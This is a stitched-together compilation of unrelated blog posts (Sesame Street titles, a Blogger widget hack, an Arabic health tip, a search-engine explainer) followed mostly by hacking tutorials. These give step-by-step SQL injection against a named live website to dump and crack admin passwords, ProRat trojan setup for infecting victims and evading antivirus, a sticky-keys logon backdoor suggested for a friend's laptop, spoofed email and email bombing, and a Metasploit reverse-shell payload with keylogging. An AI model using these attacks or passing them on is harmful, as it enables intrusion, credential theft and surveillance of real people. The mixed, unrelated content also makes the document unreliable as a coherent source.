Sesame Street: Neil Patrick Harris has Telly's New Shoes

Sesame Street: LL Cool J goes on an Addition Expedition

Blogger Auto Read More Hack : Improved With Many Control Options هاك قراءة المزيد للمدونة (شرح انجليزي)

Blogger auto read hack is the best hack available for blogger.Almost every blogger use this hack.This hack automatically create post summaries with thumbnails.We already shared a auto read more hack for blogger but this time we are sharing updated auto read more hack.With using this can controls following options as you wish,

  1. You can add default thumbnail image when your posts don't have any image.
  2. You can turn off auto read more for some first posts.
  3. Option to turn on/off read more for home page and labels page.
Above are the some features of this new auto read hack the script of this new hack is created by Rilwis.Now lets see how to apply this hack,

How To Add Auto Read More Hack To Blogger?

If you have already added a old read more hack then you have to remove it first.

  1. First go to Blogger Dashboard > Template
  2. Download a copy of your template
  3. Click Edit HTML
  4. Hit Proceed
  5. Check Expand Widget Template checkbox
  6. Find below code in your template


add below piece of code just above it,

<script type="text/javascript">
var summaryConf = {
showImage: true,
imgFloat: 'left',
imgWidth: 120,
imgHeight: 90,
defaultThumb: 'https://lh3.googleusercontent.com/-GRP8IcURRsw/T9MjiNWXUcI/AAAAAAAAB88/QEDpDHxI55o/s1600/no-thumb.jpg',
words: 65,
wordsNoImg: 80,
skip: 0,
showHome: true,
showLabel: true
<script type="text/javascript" src="http://code.helperblogger.com/summary.min.js"></script>

You can easily customize above highlighted values,below are their meaning

  • showImage: true, If you don't want to show image thumbnail then simply replace true with false
  • imgFloat: 'left', If you want to float image at the right of summary then simply replace left with right
  • imgWidth: 120, This is width of image
  • imgHeight: 90, This is height of image
  • defaultThumb: 'https://lh3.googleusercontent.com/-GRP8IcURRsw/T9MjiNWXUcI/AAAAAAAAB88/QEDpDHxI55o/s1600/no-thumb.jpg', If you want to set your own default thumbnail then replace above image URL with yours.
  • words: 65, This is number of words when there is a thumbnail
  • wordsNoImg: 80, This is number of words when there is no thumbnail
  • skip: 0, skip some first posts, don’t apply auto readmore for them. If this option is set to 0 so that all posts are applied auto readmore.
  • showHome and showLabel: allow or not auto readmore for homepage and label page. true is allowed, false is not.

Now find below code in your template,


replace it with below code,

<span expr:id='data:post.id'><data:post.body/></span>
<b:if cond='data:blog.pageType == "index"'>
<script type='text/javascript'>summary("<data:post.id/>")</script>
<span style='float:right;padding-top:20px;'><a expr:href='data:post.url'>Read More</a></span>
<b:if cond='data:blog.pageType == "archive"'>
<script type='text/javascript'>summary("<data:post.id/>")</script>

Finally take a preview of your template,if you thing that everything is alright then save your template,if not then customize it as you wish and save it :) 


ماهي طرق الوقاية من البواسير؟

الطريقة الافضل للوقاية هي الاهتمام بان يكون البراز رخوا، بحيث يستطيع العبور بسهولة.

ومن اجل الوقاية، او التخفيف من حدة اعراض البواسير، يفضل اتباع التدابير التالية:

تناول اطعمة غنية بالالياف الغذائية
الاكثار من شرب السوائل
التفكير في امكانية تناول الياف غذائية كمضاف غذائي (Food additives)
الامتناع عن بذل مجهود شاق
الدخول الى المرحاض فور الشعور بالحاجة (عدم كبح الحاجة)
ممارسة الرياضة
الامتناع عن الوقوف والجلوس لفترات زمنية طويلة  


How does Google Search work ?

Google search engine is undoubtedly most widely used search engine. It was founded by Larry Page and Sergey Brin. We must have the knowledge of basic working and methodology used by google search engine. I have explained the things in very simple words. Read Carefully

Overview :

Okay lets assume , you wanna design a little search engine that would search the requested key words in few websites (say 5 websites) ,So what would be our approach ? First of all, we will store the contents that is webpages of that 5 websites in our database. Then we will make an index including the important part of these web pages like titles,headings,meta tags etc. Then we would make a simple search box meant for users where they could enter the search query or keyword. User's entered query will be processed to match with the keywords in the index and the results would be returned accordingly. We will return user with list of the links of actual websites and the preference to those websites will be given to them using some algorithm. I hope the basic overview of working of search engine is clear to you.

Now read more regarding the same.

A web search engine works basically in the following manner. There are basically three parts.

1. Web Crawling
2. Indexing
3. Query processing or searching

1. First step of working of search engine is web crawling. A web crawler or a web spider is a software that travels across the world wide web and downloads,saves webpages. A web crawaler is fed with URLs of websites and it starts proceeding. It starts downloading and saving web pages associated with that websites. Wanna have feel of web crawaler. Download one from here. Feed it with links of websites and it will start downloading webpages,images etc associated with those websites. Name of google web crawler is GoogleBot. Wanna see the copies of webpages saved in google database ? (actually not exactly)
Lets take example of any website , say www.wikipedia.org
Do this -:
Go to google. and search for 'wikipedia' Hopefully you would get this link on top.
Click on the 'cached' link as shown.


Directly search for 'cache:wikipedia.org'

Then read the lines at top the page you got and things would be clear to you.

2. After googlebot has saved all pages, it submits them to google indexer. Indexing means extracting out words from titles,headings,metatags etc.The indexed pages are stored in google index database. The contents of index database is similar to the index at the back of your book. Google ignores the common or insignificant words like as,for,the,is,or,on (called as stop words) which are usually in every webpage. Index is done basically to improve the speed of searching.

3. The third part is query processing or searching. It includes the search box where we enter the search query/keyword for which we are looking for. When user enters the serach query, google matches the entered key words in the pages saved in indexed database and returns the actual links of webpages from where those pages are reterived. The priority is obviously given to best matching results. Google uses a patented algorithm called PageRank that helps rank web pages that match a given search string.

The above three steps are followed not only google search but most of the web search engines.Ofcourse there are many variations but methodology is same.

What is Robots.txt ?
Web Administrators do not the web crawlers or Web spiders to fetch every page/file of the website and show the links in search results.Robots.txt is a simple text file meant to be placed in top-level directory of the website which contain the links that web administrators do not want to be fetched by web crawlers. The first step of a Web Crawler is to check the content of Robots.txt

Example of contents of Robots.txt
User-agent: * //for web crawlers of all search engines
Disallow:/directory_name/file_name //specify a file of particular dir.
:/directory_name/  //all files of particular dir.

You can see robots.txt of websites (if exists). Example http://www.microsoft.com/robots.txt

SQL Injection | Step by Step deface website

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.

We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.

SQL Injection Tutorial :-
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
information_schema.tables where table_schema=database()--
Click here
We got first table name on the screen.
To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()--
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).

Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes can not be cracked.
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms.

Trojan Horse | RAT | Configure and Use | Tutorial- Part 2

Just go through the Part 1 which includes the basics of Trojan Click here. This tutorial is about configuring and using a trojan. There are many trojans available on internet for free. Some popular ones are Beast, Pro Rat, Netbus , Back Orifice, Girlfriend, Sub 7. I will be using Pro Rat in this tutorial.


1. Prorat- Click here to download Trojan Prorat.
2. Hostname - Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:

1. Log On to www.no-ip.com and register for an account.
2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.
4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.

Tutorial for configuring Trojan.

1. Open prorat.exe that you have downloaded.
2. Click on Create and then Create ProRat Server

3. Enter your host name in the ProRat Notification field as shown. Uncheck all other options.
4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.
5. Finally click on create server and now its ready to be sent to victim. Once victim installs it, it would automatically disable antivirus/firewall.

Modes of sending-:
You must be thinking of sending this server.exe to victim through an email as an attachment but unfortunately you cant do so. The good option is to upload it on any uploading site like mediafire.com and give downloading link to victim.

What after victim has run the server part ?

1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.

Note: If you know victim is online and still its not listening to any connections. Trace victim's IP,enter in IP field and hit connect. But its gonna work only if he is not behind any network and directly connected to internet. If you dont know how to trace IP, mention in comments.

What after successful connection ?
After you have managed to connect to victim's machine. There are numberless interesting things to do. I leave this part on you. Have Fun.

How to make it undetectable from antivirus ?
Though there isn't any hard and fast way to make it fully undetectable from all antiviruses. The real way to do it is modify the source code of open source trojans available. Its very challenging job. There are many crypters which claim to make it undetectable but unfortunately hardly one out every hundred works. I would try to write next article on the same.

Contermeasure against Trojans -
The obvious coutermeasure against trojans is that do not accept downloading links blindly. Keep your antivirus up to date.

Detecting and removing Trojan -
Though trojan once installed is very hard to remove . It would hide itself from the Task Manager . Install Process Explorer and it would hopefully show you all process running including trojan. Kill the process and remove it. One good thing is to carefully check the open ports and services running through 'netstat' command. Anyways , the best option is to reinstall the windows.

Setting Backdoor in Windows | Command Prompt On Logon Screen

Lets assume that you have just cracked victim's windows password. or simply got access to his windows for some time.Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?
Yes we can :) .
Backdoor actually means maintaining access.
okay lets do one thing first. Open your command prompt (run as administrator in win 7/vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.

Hopefully your new password must have been set. did you notice one thing ? It didn't ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.
Okay lets move on.
Now press shift key five times and you must have got a dialog box "sticky keys" on screen.

Sticky keys is a feature that makes it easy for users who have physical disablilities to press multiple keys at time. This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed in C:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just cant simply rename it or change system32 files. Follow the tutorial for that.

Tutorial :

* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.

@ Windows XP Users

Hopefully existing orignal sethc.exe must have been replaced and your job is done. Now press shift five times and you would see command prompt on screen.You can access command prompt at windows logon screen and change/clear the password easily using "net user" command.

Note: You can also do these changes while using windows Guest Account. But when you would access command prompt at logon screen, you can change/clear password even of administrator's account. This is exactly how , we can hack into administrator's account through guest account.

@ Windows vista/7 Users

You must have got a pop up box saying "Access Denied".

Actually you can not change system32 directory files until you do not have the permissions. You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator. Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.

2. Then click on 'Edit' in security tab to edit permissions. Click on 'Administrators' , give it full control
and apply changes.

Okay its done now.

Now try replacing the orignal sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Enjoy Command prompt at logon screen...

So do not forget to set this backdoor whenever you would get friend's laptop for a few minutes... :)

SQL INJECTION | Website Deface | Using tool | Live Example

What is SQL injection ?
SQL stands for Structured Query Language.SQL is used to design the databses. The information is stored in databses. SQL injection is the vulnerability occuring in database layer of application which allow attacker to see the contents stored in database. This vulnerabilty occures when the user's input is not filtered or improperly filtered.

The main goal of attacker is use to access the information stored in website's database. It can be done manually, read more here. In this tutorial, I am using to do the same thing easily using a tool.

Read the disclaimer first before proceeding. I remind you again that its only for educational purposes.

Requirement: Download the tool from here. Its SqliHelperV.2.1.

Steps of attack :-

Vulnerable Website > Database > Tables > Columns > Data

Search for any vulnerable website using Google Dorks. I found this website
I came to know its vulnerable because when I attached a single quote at the end, it didn't filter it and returned me with an error.


Step 1. Run the tool and there is no need of any installation. Input the vulnerable URL and click on 'Inject'

Step 2 : After processing is done. Click on "Get Database".It would then show the databases

Step 3: Select any database other than "Information_schema" and Click on "Get tables". It would start fetching all tables. Have some patience. In most of the cases there is a table like admin or login or users etc.

Step 4: Select any Table and click on "Get Columns".

Step 5: Select the column and click on "Dump Now" . A new pop up window would open showing you the data stored in it.

So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms. 

Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming

Basics of working of Email ( You can skip this part)
Email stands for Electronic Mail. Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account.

Email Travelling Path :-
Let’s say we have two Email providers, one is gmail.com and other is yahoo.com, ABC is a registered user in gmail.com and XYZ is a registered user in yahoo.com.
• ABC signs in to his Email account in gmail.com, he then writes a mail to the xyz@yahoo.com and sends the message.
• But what happens behind the curtains, the Email from the computer of abc@gmail.com is forwarded to the Email server of gmail.com. Server of gmail.com then looks for yahoo.com on the internet and forwards the Email of the yahoo.com for the account of XYZ@yahoo.com. Yahoo server puts that email in that account.
• XYZ then sits on computer and signs in to her Email account.Now she has the message in her Email inbox.

Sending Fake/spoofed Email -: Fake or spoofed email means the email from any email ID. It doesn't matter whether the sender's email really exists or not. Sender's email ID can be anything@anything.com.

Read the disclaimer before proceeding

Methods :-

1. Using Open Relay servers : An open relay server is that which allows people to send email by connecting to it. User connect to it via telnet and instructs server to send email. This method is outdated or simply I should say that, it doesn't work. I would not talk about it more.

2. Using Websites : There are numberless websites that provide free service to send fake emails. But the problem is that they attach the advertisments along with your email. But the best two, I have found that do not attach the advertisments.

www.emkei.cz {have some advance options}

3. Using mail sending scripts : The PHP contains mail sending function which allows us to send email with fake headers.
Download a php script from here.
We just need to upload the mail sending script on a web hosting site. It doesn't work on every webshosting site because there is no email sending support. I have tested x10hosting.com (could take upto a day for account activation) , it works perfect. Some of the other are www.000webhost.com,byethehost5.com

Note: This script contains options of sending spoofed email, spamming and email bombing. Your hosting account might be immediately suspended on spamming/bombing. But it works perfect if you have any your own premium web hosting account. If you want to try email bomber, I could let you to use my own if sufficient people request in comments.

What is Email Spamming and Email Bombing ?
Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click. Email spamming is like sending an email to large number of email IDs in a single click. These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them.

How to identify whether an email is real or spoofed ?

It can be done by checking headers. Email headers is simply the text which contains the information about the mail servers that the email encountered in its path from the sender to receiver. It contains a lot of other information too.
Note: I am just telling you a few points about this so that you would just get an idea about the approach. This may or may not depend on some factors.

We can view email headers in gmail by clicking at 'show orignal', in yahoo by clicking at 'Full headers' and such kinds of options in other email service providers.

If you get an email displaying sender's email like someone@gmail.com, someone@hotmail.com, someone@yahoo.com . Then it should be orignated from gmail,hotmail and yahoo servers respectively. But if it doesn't, the most probably the email would be fake.

I will show you by an example, I received three emails in my gmail inbox from sender's address "someone@gmail.com." Sender's address shows me that they should have been orignated from gmail/google server, if they would be real.

Note : There is a field called "Return-path" in headers. If the email ID shown in this field and email ID you get as sender's email ID doesnt match, then the email is surely fake.

Can we get sender's IP address from Email Headers ?

We may or may not. Gmail, yahoo normally do not reveal sender's IP address. But when we send an email from a php script, the headers might reveal Sender's IP. The conclusion is that answer to this question varies from different email service providers and the way how email is sent.

Can we trace sender's location, if we get his IP address ?

The IP address could only tell that which Internet Service Provider (ISP) is used by sender. Further details can not be revealed without the help of that ISP. Normally the Public IP is dynamic that is it keeps changing. We need to ask ISP about the user who was assigned that IP at the time email was sent. If sender has purchased a static IP address, it doesn't matter that when exactly was email sent. He could easily be traced.

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
win7-pc\win 7

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

About Author : This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include Privacy Issues online, Web Application Security and Wireless Hacking. You can connect with him on facebook here